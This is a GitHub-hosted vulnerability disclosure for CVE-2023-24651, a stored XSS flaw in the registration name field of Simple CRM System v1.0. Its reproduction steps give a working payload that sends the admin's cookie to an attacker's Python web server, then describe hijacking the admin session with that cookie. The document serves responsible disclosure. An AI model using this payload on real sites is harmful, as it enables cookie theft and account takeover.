Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2023-24651/CVE-2023-24651.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
83 lines (82 sloc)
3.64 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > [Suggested description] | |
| > Simple Customer Relationship Management System v1.0 was discovered to | |
| > contain a cross-site scripting (XSS) vulnerability via the name parameter on the | |
| > registration page. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Additional Information] | |
| > Steps-To-Reproduce: | |
| > Step 1:\tGo to the registration page http://localhost/php-scrm/registration.php | |
| > Step 2:\tNow fill out the registration form and put the payload in the name field. | |
| > \t\t\tPayload: <img src=x onerror=this.src=`http://192.168.1.208:1234/?c=`+document.cookie> | |
| > Step 3:\tNow click on the Create Account button. | |
| > Step 4:\tNow Start the python web server on attacker system. | |
| > \t\t\t# python -m http.server 1234 | |
| > Step 5:\tNow when the admin loged in to the admin panel and navigate to the Users tab to manage users (http://localhost/php-scrm/admin/manage-users.php) from the dashboard the XSS payload is executed and the attacke gets the admin cookie on attackers web server. | |
| > Step 6:\tNow navigate to the admin login page http://127.0.0.1/php-scrm/login.php in new private window. | |
| > Step 7:\tNow copy the cookie which we get on python web server when the xss payload is executed. | |
| > Step 8:\tNow change the PHPSESSID value with the copied cookie like "vupi1sfffgpla0tt0hijfpeneq" and save it by the cookie editor. | |
| > Step 9:\tNow navigate to the admin dashboard by following URL: http://localhost/php-scrm/admin/home.php | |
| > Step 10:\tThe admin user session successfully Hijeck. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vulnerability Type] | |
| > Cross Site Scripting (XSS) | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vendor of Product] | |
| > https://www.sourcecodester.com | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Product Code Base] | |
| > Simple Customer Relationship Management (CRM) System - 1.0 | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Component] | |
| > http://localhost/php-scrm/registration.php | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Type] | |
| > Remote | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Code execution] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Escalation of Privileges] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Information Disclosure] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Vectors] | |
| > Cross-Site Scripting (XSS) is a type of cyber attack that allows an attacker to inject malicious code into a website. When a victim visits the compromised website, the injected code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, steal cookies, or perform other malicious actions. | |
| > | |
| > Stored XSS is a type of XSS that involves injecting malicious code into a website's persistent storage, such as a database, which is then served to users when they access the website. | |
| > | |
| > Form-based Cross-Site Scripting (XSS) attacks can have serious consequences for both individuals and organizations. By injecting malicious code into a website through a form field, an attacker can potentially steal sensitive information, and an admin cookie, redirect victims to malicious websites, execute unauthorized actions on behalf of the victim, and even inject additional malicious code into the website to continue executing malicious actions. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Reference] | |
| > https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html | |
| > https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Discoverer] | |
| > Yogesh Verma | |
| Use CVE-2023-24651. |